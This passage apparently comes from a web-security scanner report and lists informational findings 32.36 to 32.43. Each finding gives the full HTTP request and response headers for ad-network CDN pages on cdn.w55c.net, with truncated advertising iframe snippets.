Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 2684

<iframe src="http://altfarm.mediaplex.com/ad/fm/14302-119028-29115-1?mpt=[CACHEBUSTER]&mpvc=" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=
...[SNIP]...

32.36. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RNYnkg2EM_1392081529.html

Request

GET /i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTl8R0ZqRXJKdHl0MHwxMzAzNjU4NDIxODU1fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUwMTk3&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_swAMWpIK5YMIH2txmb8GB__on5K2_4iSvA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTk&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=150&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676422&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658422794&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658422802&frm=1&adk=2614322350&ga_vid=1769074993.1303658423&ga_sid=1303658423&ga_hid=1301346497&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:21 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:56 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 19:16:30 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 420

<iframe src="http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-1?mpt=[CACHEBUSTER]&mpvc=" width=160 height=600 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=
...[SNIP]...

32.37. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0ROvzxEJNe_571009919.html

Request

GET /i/0ROvzxEJNe_571009919.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYXzEwMjM0NzcyMDZ8NTcwMDA0&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNLgAJ-Z4K5X1DKQVTggYCu04PFXSP5d7SLQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZCWWt3ZjdTVw&ciu=MFJPdnp4RUpOZQ&reqid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=570&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679873&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661873586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661873599&frm=1&adk=2614322350&ga_vid=1404053174.1303661874&ga_sid=1303661874&ga_hid=824907956&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=19
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:15:59 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:17:52 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 17:52:03 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 113
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061002 (MII-APC/1.6)
Content-Length: 732

<iframe id='a3cde47f' name='a3cde47f' src='http://d.w55c.net/afr.php?zoneid=790&amp;cb=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYX
...[SNIP]...

32.38. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RW21p2fqU_270915107.html

Request

GET /i/0RW21p2fqU_270915107.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDI1MjE4NQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQNgAFoToK7FcQpbsDBuQ7j9zay5ySEgzsXw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZjSUxxQkZUbw&ciu=MFJXMjFwMmZxVQ&reqid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=252&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680649&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662649299&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303662649303&frm=1&adk=2614322350&ga_vid=278906705.1303662649&ga_sid=1303662649&ga_hid=1493962260&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815001&fu=4&ifi=1&dtd=6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:30:47 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:01:50 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 20 Apr 2011 21:25:08 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 810

<iframe id='adcfce52' name='adcfce52' src='http://d.w55c.net/afr.php?zoneid=750&amp;cb=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRU
...[SNIP]...

32.39. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RZieDDeGI_308736425.html

Request

GET /i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680735&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662735800&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662735812&frm=1&adk=2614322350&ga_vid=273036336.1303662736&ga_sid=1303662736&ga_hid=1991820173&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:32:14 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:30:15 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:51:31 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 3553

<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfD
...[SNIP]...

32.40. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RaZHwYk2m_562981296.html

Request

GET /i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676644&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658644881&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658644887&frm=1&adk=513358139&ga_vid=1984226007.1303658645&ga_sid=1303658645&ga_hid=40124116&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:18 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 21 Apr 2011 23:51:09 GMT
Date: Sun, 24 Apr 2011 15:24:15 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1246

<IFRAME SRC="http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUm
...[SNIP]...

32.41. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RilLTaqf1_958911823.html

Request

GET /i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681865&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663865478&bpp=16&shv=r20110420&jsv=r20110415&correlator=1303663865496&frm=1&adk=2614322350&ga_vid=1538346491.1303663866&ga_sid=1303663866&ga_hid=2007194349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=121
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:56:20 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:50:11 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 17:50:22 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1380

<IFRAME SRC="http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1l
...[SNIP]...

32.42. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Request

GET /i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:14 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Fri, 01 Apr 2011 14:32:11 GMT
Date: Sun, 24 Apr 2011 15:19:34 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1238

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQ
...[SNIP]...

32.43. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:19:53 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
